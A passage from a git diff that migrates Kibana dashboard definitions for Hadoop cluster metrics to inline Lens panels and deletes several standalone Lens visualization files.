40, + "y": 0 }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", - "type": "index-pattern" + "panelIndex": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1965ff1a-73c8-4f6c-be65-230190b5ca22", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5199984c-035a-4e47-9d4a-d63d01735d8b": { + "columnOrder": [ + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04" + ], + "columns": { + "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.nodes.unhealthy: *" + }, + "isBucketed": false, + "label": "Unhealthy Nodes", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": 
"@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.nodes.unhealthy" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1965ff1a-73c8-4f6c-be65-230190b5ca22", + "key": "hadoop.cluster.nodes.unhealthy", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.nodes.unhealthy" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "d42e51f5-5ec7-48ad-80f4-acdd5f9b7f04", + "layerId": "5199984c-035a-4e47-9d4a-d63d01735d8b", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:6289f262-f60c-4d6c-9480-c8d037633755", - "type": "index-pattern" + "title": "Number of unhealthy nodes [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "d78560b6-a798-4b6b-b702-252c1319af9c", + "w": 24, + "x": 24, + "y": 5 }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:c26ffbdc-b9a3-4a13-870a-6e83389b4007", - "type": "index-pattern" + "panelIndex": "d78560b6-a798-4b6b-b702-252c1319af9c", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6289f262-f60c-4d6c-9480-c8d037633755", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "type": "index-pattern" + } + ], + 
"state": { + "datasourceStates": { + "formBased": { + "layers": { + "faa4a447-faac-4424-9e42-5a29b0ad1137": { + "columnOrder": [ + "55139a89-d014-4b5e-9195-8d7874ae4a47", + "aac01fd6-85b3-4678-a105-90b6bfef291a", + "2c271321-b9d9-4fc0-8bb4-0483f527c16b", + "88d60efa-e82b-43e6-bd18-e523c386af79" + ], + "columns": { + "2c271321-b9d9-4fc0-8bb4-0483f527c16b": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.pending: *" + }, + "isBucketed": false, + "label": "Pending", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.pending" + }, + "55139a89-d014-4b5e-9195-8d7874ae4a47": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "88d60efa-e82b-43e6-bd18-e523c386af79": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.failed: *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.failed" + }, + "aac01fd6-85b3-4678-a105-90b6bfef291a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.running" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + 
"meta": { + "alias": null, + "disabled": false, + "index": "6289f262-f60c-4d6c-9480-c8d037633755", + "key": "hadoop.cluster.applications.running", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.running" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "key": "hadoop.cluster.applications.pending", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.pending" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "key": "hadoop.cluster.applications.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "aac01fd6-85b3-4678-a105-90b6bfef291a", + "2c271321-b9d9-4fc0-8bb4-0483f527c16b", + "88d60efa-e82b-43e6-bd18-e523c386af79" + ], + "layerId": "faa4a447-faac-4424-9e42-5a29b0ad1137", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "55139a89-d014-4b5e-9195-8d7874ae4a47", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "aac01fd6-85b3-4678-a105-90b6bfef291a" + }, + { + "axisMode": "left", + "forAccessor": "2c271321-b9d9-4fc0-8bb4-0483f527c16b" + }, + { + "axisMode": "left", + "forAccessor": "88d60efa-e82b-43e6-bd18-e523c386af79" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true + }, + 
"preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Applications" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "type": "index-pattern" + "title": "Number of applications over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", + "w": 8, + "x": 0, + "y": 18 }, - { - "id": "metrics-*", - "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.allocated: *" + }, + "isBucketed": false, + "label": "Containers Allocated", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.allocated" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": 
"446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "key": "hadoop.cluster.containers.allocated", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.allocated" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "type": "index-pattern" + "title": "Number of containers allocated [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", + "w": 8, + "x": 8, + "y": 18 }, - { - "id": "metrics-*", - "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.pending: *" + }, + "isBucketed": false, + "label": "Containers Pending", + 
"operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.pending" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "key": "hadoop.cluster.containers.pending", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.pending" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "type": "index-pattern" + "title": "Number of containers pending [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "589a1406-7ccf-49b7-a6b7-618841e3339b", + "w": 8, + "x": 16, + "y": 18 }, - { - "id": "metrics-*", - "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "589a1406-7ccf-49b7-a6b7-618841e3339b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d1592d8a-7e50-4768-a449-a05551db392d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + 
"570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.reserved: *" + }, + "isBucketed": false, + "label": "Containers Reserved", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.reserved" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d1592d8a-7e50-4768-a449-a05551db392d", + "key": "hadoop.cluster.containers.reserved", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.reserved" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:d1592d8a-7e50-4768-a449-a05551db392d", - "type": "index-pattern" - } + "title": "Number of containers reserved [Metrics Hadoop]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Cluster overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"08fde296-94c6-4dbd-bd1f-77c67e0125e6:4b01387d-bd18-4e16-b860-005e4a71e957", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:d846e0a6-42a9-4840-82e4-f217959a63fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:c50d822a-587a-4198-90c1-847fe7355fa1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:e78473e3-a006-46cf-bada-e75ab9c4b279", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:b880f665-29b3-40b9-bd45-459f3105c645", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d55a200-501c-45bf-94a9-a3c36744865d:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d55a200-501c-45bf-94a9-a3c36744865d:b98d7344-acd9-4e73-a62b-a34aee54465c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:1965ff1a-73c8-4f6c-be65-230190b5ca22", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:6289f262-f60c-4d6c-9480-c8d037633755", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 
"d78560b6-a798-4b6b-b702-252c1319af9c:70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:d1592d8a-7e50-4768-a449-a05551db392d", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 677f7cf9153..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json +++ /dev/null 
@@ -1,223 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "69af342c-71f3-41fe-a76e-cc9f49baafa3": { - "columnOrder": [ - "797ebde1-9d7b-4950-9554-194d5c702684", - "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", - "4b9fcd50-2227-40e5-a93b-ebb16831630d", - "56fd6e61-acf3-45e6-9904-98f7ffa90644" - ], - "columns": { - "4b9fcd50-2227-40e5-a93b-ebb16831630d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.bytes.read" - }, - "56fd6e61-acf3-45e6-9904-98f7ffa90644": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes written", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.bytes.written" - }, - "797ebde1-9d7b-4950-9554-194d5c702684": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "fc0da319-4b72-4ccc-8e27-2c4ebec508c7": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of service.address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "service.address" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - 
}, - "meta": { - "alias": null, - "disabled": false, - "index": "fbe5ed56-727a-408f-ab58-b03abf1502da", - "key": "hadoop.datanode.bytes.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.bytes.read" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "37000496-671a-41ab-ab7b-35823e718530", - "key": "hadoop.datanode.bytes.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.bytes.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4b9fcd50-2227-40e5-a93b-ebb16831630d", - "56fd6e61-acf3-45e6-9904-98f7ffa90644" - ], - "layerId": "69af342c-71f3-41fe-a76e-cc9f49baafa3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", - "xAccessor": "797ebde1-9d7b-4950-9554-194d5c702684" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Bytes" - } - }, - "title": "Number of bytes read and written [Hadoop Metrics]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - 
"lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fbe5ed56-727a-408f-ab58-b03abf1502da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "37000496-671a-41ab-ab7b-35823e718530", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json deleted file mode 100644 index f9564bfcc41..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json +++ /dev/null 
@@ -1,110 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "bfc4ee7d-e67a-492c-a0de-3ba41b193e52": { - "columnOrder": [ - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" - ], - "columns": { - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Disk Capacity", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "median(hadoop.datanode.disk_space.capacity)", - "isFormulaBroken": false - }, - "references": [ - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" - ], - "scale": "ratio" - }, - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Disk Capacity (GB)", - "operationType": "median", - "scale": "ratio", - "sourceField": "hadoop.datanode.disk_space.capacity" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "87fdb03b-29d6-48a3-952a-da13b704e34a", - "key": "hadoop.datanode.disk_space.capacity", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.disk_space.capacity" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", - "layerId": "bfc4ee7d-e67a-492c-a0de-3ba41b193e52", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Data node disk capacity [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": 
"indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "87fdb03b-29d6-48a3-952a-da13b704e34a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 57f31fc2a84..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json +++ /dev/null 
@@ -1,88 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "efa00ae4-03e1-45c9-aaa9-47610de989d9": { - "columnOrder": [ - "5e28f952-df42-4162-8195-af6ee018c227", - "5e28f952-df42-4162-8195-af6ee018c227X0" - ], - "columns": { - "5e28f952-df42-4162-8195-af6ee018c227": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Cache used", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(hadoop.datanode.cache.used)", - "isFormulaBroken": false - }, - "references": [ - "5e28f952-df42-4162-8195-af6ee018c227X0" - ], - "scale": "ratio" - }, - "5e28f952-df42-4162-8195-af6ee018c227X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Cache used", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.cache.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" and hadoop.datanode.cache.capacity : * and hadoop.datanode.cache.used : * " - }, - "visualization": { - "accessor": "5e28f952-df42-4162-8195-af6ee018c227", - "layerId": "efa00ae4-03e1-45c9-aaa9-47610de989d9", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Cache used from total cache [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", - "type": "index-pattern" - 
} - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index fa765412c59..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "781bec53-7762-43ba-bc46-4a54c6b985ae": { - "columnOrder": [ - "931e5379-b427-4096-8030-51a9ad546b02" - ], - "columns": { - "931e5379-b427-4096-8030-51a9ad546b02": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Cached blocks", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.blocks.cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "hadoop.datanode.blocks.cached : * " - }, - "visualization": { - "accessor": "931e5379-b427-4096-8030-51a9ad546b02", - "layerId": 